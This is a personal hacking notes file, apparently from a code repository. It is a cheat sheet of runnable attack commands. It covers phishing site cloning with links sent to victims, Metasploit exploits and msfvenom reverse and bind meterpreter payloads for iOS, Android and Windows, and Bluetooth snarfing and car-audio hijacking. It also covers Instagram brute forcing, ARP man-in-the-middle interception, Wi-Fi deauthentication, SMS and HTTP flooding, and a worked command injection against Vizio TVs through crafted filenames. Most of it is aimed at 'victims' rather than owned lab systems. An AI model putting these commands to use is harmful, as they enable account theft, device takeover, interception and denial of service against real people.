-
Notifications
You must be signed in to change notification settings - Fork 0
/
hackingNotes.txt
430 lines (297 loc) · 10.8 KB
/
hackingNotes.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
CURRENT WIFI DEVICES CONNECTED
write: " netdiscover " <--- longer its up the more ip types it scans
NETDISCOVER QUICK SCAN
avoids nmap scan block COD has ...?
netdiscover -r 10.6.83.0/24
LINUX CHECK RUNNING APPS
write - "top"
GOOGLE CHROME
- "google-chrome --no-sandbox"
OPEN FLIPPER ZERO APP
write: flipper
INSTALLING FIRMWARE FOR FLIPPER
- go to firmware github
- find .tgz folder and download
- on qFlipper app homepage click "install from file"
- look for downloaded .tgz folder in file explorer
HOLDING MULTIPLE FIRMWARES ON FLIPPER ZERO
- on qFlipper go to sd card file explorer
- find "/update" folder
- this folder holds all downloaded custom firmwares
- make sure to extract zipped .tgz file and youll have its actual folder ready locally
- drag and drop .tgz folders here
SWAP FIRMWARES FROM FLIPPER DEVICE
- on flipper zero device find browser by pressing down then left
- go to /update folder
- select custom firmware
- navigate to the "update" file
- run update file
UPGRADE ALL PIP PACKAGES (powershell)
pip list --outdated
pip freeze | %{$_.split('==')[0]} | %{pip install --upgrade $_}
GIT CLI ACCOUNT CREDENTIALS
go to github developer settings in the settings tab
generate personal auth token
within CLI type - git config --global credential.helper cache
now make a git command like push or setting remote
git will prompt you for your username and auth token one last time
MYSQL START SERVER COMMANDS:
service mysql start
mysql -u root -p
FIND SAVED WIFI PASSWORDS
cd /etc/NetworkManager/system-connections
ls
cat <wifi name file>
"look for value - psk "
MONITOR WIFI GUI:
etherape
SITE CLONING ATTACK
CMD: setoolkit
choices - [1 , 3 , 2 ]
now imput the ip address of your computer
copy log in web page of cloned site
allow user to go onto browser and type in your ipadress
HAS TO BE ON SAME WIFI
BEST USE CASES
show victim phone and say log in...
SPARROW WAR DRIVING:
"cd into folder"
./sparrow-wifi.py
RUBBER DUCKY :
"cd into folder"
cd USB-Rubber-Ducky/Encoder/
java -jar encoder.jar -i input_payload.txt -o inject.bin
METASPLOIT IOS HACK COMMANDS:
service postgresql start
msfconsole
use exploit/apple_ios/browser/safari_libtiff
show options
set lport 8080 (whatever SRVPORT was)
"Open new terminal"
ifconfig
*get lnet ip address
"back to METASPLOIT terminal"
set lhost <lnet IP ADDRESS> (192.168.1.13)
"new terminal"
curl ipinfo.io/ip
*get the ip for next
"METASPLOIT"
set SRVHOST *IP ADDRESS* (131.150.163.82)
set SRVPORT 8080
exploit
set reverselistenerbindaddress 1
METASPLOIT ANDROID HACK COMMANDS:
service postgresql start
msfconsole
use exploit/android/browser/webview_addjavascriptinterface
set SRVHOST 192.168.1.13
set URIPATH /
set LHOST 192.168.1.13
set LPORT 4444
set VERBOSE true
set ReverseListenerBindAddress 192.168.1.13
set ReverseListenerBindPort 4444
run
"change http link on bitly and get victim to use"
REFERENCE TO SESSIONS -https://www.hackingarticles.in/msfvenom-tutorials-beginners/
EGGSHELL IOS HACK :
"cd into folder"
python eggshell.py
bash for terminal hacks
https://kalilinuxtutorials.com/eggshell-remote-administration-tool/
LAZY SCRIPT START:
"cd into folder"
./l
SHERLOCK:
"cd into folder"
python3 sherlock.py seanhannity -r --print-found
GHOST ANDROID DEBUGGER MODE HACK :
"cd into folder"
"cd into ghost"
python3 ghost
KISMET WIFI MONITORING:
'cd to folder'
airmon-ng start wlan0
kismet -c wlan0mon
WHEN FINISHED - airmon-ng stop wlan0mon
PHONEINFOGA:
"cd into folder"
python3 phoneinfoga.py -n 16309232300
NEXPHISHER SITE CLONINGs:
bash nexphisher
"choose a webiste to clone"
"select ngrok"
"send link to victim"
ANONYMOUS IP ADDRESS:
service tor status
"if not active"
service tor start
proxyxhains <PROGRAM NAME>
BLUETOOTH HACKS:
hcitool scan
"grab victim mac address"
sdptool browse <mac address>
OR
btscanner <---- MAKE SURE FULL SCREEN CONSOLE
BLUESNARFER:
hcitool scan
"grab mac address"
l2ping <mac address>
"make sure you get a ping"
"use above btscanner to find channel to connect with"
bluesnarfer -r 1-100 -C 8 -b <mac address>
CARWHISPERER:
"cd into carwhisperer-0.2"
hciconfig hci0 class 0x50204
hcitool scan
"Find mac address"
l2ping <mac address>
"make sure you get a ping"
./carwhisperer hci0 out.raw recording.raw <mac address>
LAZY SCRIPT:
"cd into folder "
run ---> ./l
-Find router login page: options 20 , 8
-change mac : option 3
-public ip address - option 7
INSTAGRAM:
-instax <insta brute force hack>:
service tor start
bash instax.sh
"follow prompts"
FILENAME.lst
GEOLOCATE IP ADDRESS:
cd into lscript
./l
option 19
enter ip address
GHUNT:
'cd to folder'
python3 hunt.py <Gmial Email>
MONITOR MODE
iwconfig
ifconfig wlan0 down
airmon-ng check kill
airmon-ng start wlan0
STOP MONITOR MODE WHEN FINISHED
- airmon-ng stop wlan0mon ifconfig wlan0 up
(resetting pc will bring back wifi)
MAN IN THE MIDDLE ATTACK (webrowser)
nmap -sn <your ip address>/24 your ip = "192.168.1.102" (the "/24" is to scan all ports from yours to that number)
^ you can also use netdiscover to find victims ^
ettercap -T -S -i wlan0 -M arp:remote /<your ip>// /<target ip>//
run wireshark on new terminal
select wlan0
ip.addr== <victim ip> && http
COMMAND INJECTION vizio
touch 'file & cd & ls &.tgz' && curl -F scpl_tgz_package=@./'file & cd & ls &.tgz' "https://192.168.1.136:7345/install" -k
or
name a file --> "file & cd & ls &.tgz"
curl -F scpl_tgz_package=@./'file & cd & ls &.tgz' "https://192.168.1.136:7345/install" -k
SSH
from windows ---> linux
linux - "sudo service ssh start"
windows = " ssh @root192.168.1.102 " ------> " ssh @root<wifi ip address> "
BOOT OFF WIFI
start monitor mode
airmon-ng start wlan0
find the BSSID (router mac address) that youre connected to
airodump-ng wlan0mon
home router: ' 60:38:E0:8D:6D:2F '
rootz - 02:9F:C2:71:68:3A
find the connected device we want to attack
airodump-ng wlan0mon --bssid [routers BSSID here]--channel [routers channel here]
airodump-ng wlan0mon --bssid 60:38:E0:8D:6D:2F --channel 11
boot the device
aireplay-ng --deauth 0 -c [DEVICES MAC ADDRESS] -a [ROUTERS MAC ADDRESS] wlan0mon
aireplay-ng --deauth 0 -c E0:8E:3C:39:18:82 -a 02:9F:C2:71:68:3A wlan0mon
QUACK SPAMMER ddos:
"cd into folder"
SMS
quack --tool SMS --target 15554443333 --timeout 10 --threads 10
HTTP
quack --tool HTTP --target http://example.com/ --timeout 10 --threads 10
TCP
quack --tool TCP --target 192.168.1.100:80 --timeout 10 --threads 10
msfvenom android apk attack
192.168.1.66 find local ip address
- msfvenom -p android/meterpreter/reverse_tcp lhost=127.0.0.1 lport=4444 -f raw -o test.apk
'''
have buddy download the apk
then run steps into console.
'''
- msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.0.103
set lport 4444
exploit
FINDING OPEN SSH PORTS
ifconfig | grep inet
grab wifi ip
'192.168.1.102'
get the ip range
ipcalc <current wifi IP>
ipcalc 192.168.1.102
"192.168.1.0/24 " <--- the range is the /24 to identify all
scan network
nmap <ip range> -p <port> --open
nmap 192.168.1.0/24 -p 22 --open
METASPLOIT / MSFVENOM
-first make a file that will be uploaded onto victim using msfvenom
-then open up msfconsole and run the explot file from their lib of exploits
*this script will start a server
-now once the victim runs this new file, you will gain access using the msfconsole's server
IOS meterpreter
msfvenom -p apple_ios/aarch64/meterpreter_reverse_tcp LHOST=$LHOST LPORT=4444 -f macho -o out
msfconsole -qx “use exploit/multi/handler; set payload apple_ios/aarch64/meterpreter_reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j”
chmod +x out
brew install ldid
ldid -S out
Transfer it to the jailbroken device and run it (via ssh)
Verify you get a session
Verify webcam_stream/snap works
MSFVENOM TUTORIAL https://blackhattutorial.com/msfvenom-tutorials-for-beginners/
run command to create file onto the desktop...
file needs to be sent to victim
- msfvenom -p windows/meterpreter/bind_tcp -f exe > /root/Desktop/bind.exe
once bind_tcp.exe has been sent to the victim, run following commands on MSFCONSOLE
- use exploit/multi/handler
- set payload windows/meterpreter/bind_tcp
- set rhost xxx.xxx.xxx.xxx
- set lport 4444
- exploit
videos to see
https://www.youtube.com/watch?v=E2vjovsX4-Q
https://www.youtube.com/watch?v=YRm-St0bJhU
https://www.ehacking.net/2020/04/how-to-hack-an-android-phone-using-metasploit-msfvenom-in-kali-linux.html
https://www.youtube.com/watch?v=4rfwO-76T1M
https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/
____________________________________________________________________
VIZIO SERVER IP ENDPOINT FILE INJECTION
file & cd & cd & cd & pwd &.tgz
change both inputs on touch and injection
COMMAND INJECTION vizio
one liner --> touch 'file & cd & ls &.tgz' && curl -F scpl_tgz_package=@./'file & cd & ls &.tgz' "https://192.168.1.136:7345/install" -k
or
name a file --> "file & cd & ls &.tgz"
type --> curl -F scpl_tgz_package=@./'file & cd & ls &.tgz' "https://192.168.1.136:7345/install" -k
PROCEDURE
nmap local are network to find vizio tv
find what port <ip>:<port>/install accepts or rather blocks connection
you'll notice that it is an un authorized denial... not a not found
after gaining intel on ip and port run attack
touch 'file & <CMD> & <CMD> &.tgz' && curl -F scpl_tgz_package=@./'file & <CMD> & <CMD> &.tgz' "https://<VICTIM LOCAL IP>:7345/install" -k
PYTHON CODE
you could essentially write a python file in a loop that asks for commands and create files that curl to victim server and then display output... then delete attack command file
OUTPUT
cast_cacert.pem
lighttpd.conf
restapp.fcgi
scpl-server.pem
scpl.sh
static
ATTACKING CMD STRING file name
file & cd & pwd &.tgz
change both inputs on touch and injection
make sure to delete files you create with attacking command string as the name